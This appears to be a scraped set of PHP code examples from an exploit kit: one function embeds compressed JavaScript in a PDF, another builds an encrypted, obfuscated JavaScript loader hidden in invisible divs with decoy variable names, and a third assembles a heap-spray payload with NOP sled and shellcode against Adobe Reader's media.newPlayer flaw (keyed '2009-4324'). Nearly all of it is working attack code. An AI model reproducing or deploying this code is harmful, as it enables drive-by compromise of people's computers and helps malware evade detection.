Esempio n. 1
0
    function _putjavascript() {
    	$randoms = Obfuscators::get_random_string_array(15, 30);
        $this->_newobj();
        $this->n_js=$this->n;
        $this->_out('<<');
        $this->_out("/Names [($randoms[0]) ".($this->n+1).' 0 R]');
        $this->_out('>>');
        $this->_out('endobj');
        $this->_newobj();
        $this->_out('<< /S /JavaScript/JS '.($this->n+1).' 0 R >>');
        $this->_out('endobj');
        $this->_newobj();
		$data = $this->javascript;
        $data = gzcompress($data);
        $this->_out('<</Filter /FlateDecode /Length '.strlen($data).'>>');
		$this->_putstream($data);
        $this->_out('endobj');
    }
Esempio n. 2
0
	public static function encrypt($original) {
	    $symb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
	    $rnd_split = $symb[rand(0, strlen($symb) - 1)];
	    $original = Obfuscators::mkcrypt($original, $rnd_split);
	
	    $key = Obfuscators::gen_key(rand(40, 60));
	    $crypt = Obfuscators::crypt_with_key($original, $key);
	
	    $ii = 0;
	    while (strlen($crypt) > 0) {
	        $pos = rand(50, 590);
	        $var_array[$ii] = substr($crypt, 0, $pos);
	        $crypt = substr($crypt, $pos);
	        $ii++;
	    }
	
	    for ($ii = 0; $ii < count($var_array); $ii++) {
	        $rnd_div_name = Obfuscators::get_random_string_array(rand(2, 10), count($var_array));
	        $tag_name = Obfuscators::rand_tag_name();
	        if (rand(0, 3) == 0) $rn = " \r\n";
	        else $rn = "";
	        //$TESTECH.= $var_array[$ii];
	        $div_echo .= "<$tag_name id ='$rnd_div_name[$ii]'>".$var_array[$ii]."</".$tag_name.">".$rn;
	        if ($ii == (count($var_array) - 1)) {
	            $js_array .= '"'.$rnd_div_name[$ii].'"';
	        }
	        else {
	            $js_array .= '"'.$rnd_div_name[$ii].'",';
	        }
	    }
	    $div_echo = "<div style='display: none;'>".$div_echo."</div>";
	    $js_array = "new Array(".$js_array.");";
	
	    $rnd_nm_crypt = Obfuscators::get_random_string_array(rand(3, 10), 19);
	    $script_body = '';
		$script_body .= "<script>";
		$script_body .= "var $rnd_nm_crypt[10] = '';";
		$script_body .= "var $rnd_nm_crypt[8] = $js_array";
		$script_body .= "var $rnd_nm_crypt[12] = '';";
		$script_body .= "function $rnd_nm_crypt[7]($rnd_nm_crypt[8],$rnd_nm_crypt[9]) {";
		$script_body .= "return $rnd_nm_crypt[9] = document.getElementById($rnd_nm_crypt[8][$rnd_nm_crypt[9]]).innerHTML;}";
		$script_body .= "function $rnd_nm_crypt[13] ($rnd_nm_crypt[14]) {";   
		$script_body .= "return String.fromCharCode($rnd_nm_crypt[14]);}";
		$script_body .= "function decryptor($rnd_nm_crypt[15]) {";
		$script_body .= "$rnd_nm_crypt[16] = $rnd_nm_crypt[15].split('$rnd_split');";
		$script_body .= "for (var i=0;i<$rnd_nm_crypt[16].length-1;i++) {";
		$script_body .= "$rnd_nm_crypt[16][i]++;";
		$script_body .= "$rnd_nm_crypt[12] += $rnd_nm_crypt[13]($rnd_nm_crypt[16][i]);} return($rnd_nm_crypt[12]);}";
		$script_body .= "function $rnd_nm_crypt[17]($rnd_nm_crypt[5]) {";
		$script_body .= "var $rnd_nm_crypt[1],$rnd_nm_crypt[2],$rnd_nm_crypt[3],$rnd_nm_crypt[4] = '',";
		$script_body .= "$rnd_nm_crypt[6] ='$key';";
		$script_body .= "for($rnd_nm_crypt[1] = 0;$rnd_nm_crypt[1]<$rnd_nm_crypt[5].length;$rnd_nm_crypt[1]++){";
		$script_body .= "$rnd_nm_crypt[2] = $rnd_nm_crypt[5].charAt($rnd_nm_crypt[1]);";
		$script_body .= "$rnd_nm_crypt[3] = $rnd_nm_crypt[6].indexOf($rnd_nm_crypt[2]);";
		$script_body .= "if($rnd_nm_crypt[3]>=0) {";
		$script_body .= "if($rnd_nm_crypt[3] == 0){ $rnd_nm_crypt[3] = " . (strlen($key) - 1) . ";}";
		$script_body .= "else { $rnd_nm_crypt[3] = $rnd_nm_crypt[3] -1;} $rnd_nm_crypt[4] += $rnd_nm_crypt[6].charAt($rnd_nm_crypt[3]);}"; 
		$script_body .= "else { $rnd_nm_crypt[4] += $rnd_nm_crypt[2]; }};";
		        
		$script_body .= "xvx = decryptor($rnd_nm_crypt[4]); return xvx;}";
		$script_body .= "var $rnd_nm_crypt[11] = $rnd_nm_crypt[8].length;";
		$script_body .= "for ($rnd_nm_crypt[9] = 0; $rnd_nm_crypt[11] > $rnd_nm_crypt[9]; $rnd_nm_crypt[9]++) {var $rnd_nm_crypt[10] = $rnd_nm_crypt[10] + $rnd_nm_crypt[7]($rnd_nm_crypt[8],$rnd_nm_crypt[9]);}";
		$script_body .= "var $rnd_nm_crypt[9] = $rnd_nm_crypt[17]($rnd_nm_crypt[10]);";
		$script_body .= "var gogle=document; var yandex=document;";
		$script_body .= "gogle.write('<scri'+'pt>');";
		$script_body .= "yandex.write($rnd_nm_crypt[9]);";
		$script_body .= "document.write('</sc'+'ript>');";
		$script_body .= "</script>";
		
	    $script_body = str_replace("\r\n", ' ', $script_body);
	    $out = $div_echo.$script_body;
	
	    return $out;
	}
	function addNewPlayer($shellcode) {
		$randoms = Obfuscators::get_random_string_array(15, 30);
		$payload = "";
		$payload .= " var $randoms[1] = unescape('$shellcode');";
		$payload .= " var $randoms[2] = unescape('\x90\x90\x90\x90\x90\x90\x90\x90');";
		$payload .= " var $randoms[3] = unescape('0x0c0c0c0c');";
		$payload .= " while($randoms[2].length <= 0x8000) $randoms[2]+=$randoms[2];";
		$payload .= " $randoms[2]=$randoms[2].substring(0,0x8000 - $randoms[1].length);";
		$payload .= " memory=new Array();";
		$payload .= " for(i=0;i<0x2000;i++) { memory[i]= $randoms[2] + $randoms[1]; }";
		$payload .= " util.printd('$randoms[4]', new Date());";
		$payload .= " util.printd('$randoms[5]', new Date());";
		$payload .= " try {this.media.newPlayer(null);} catch(e) {}	";
		$payload .= " util.printd($randoms[3], new Date());";
//		$this->IncludeJS($payload);
		$this->exploits['2009-4324'] = $payload;
	}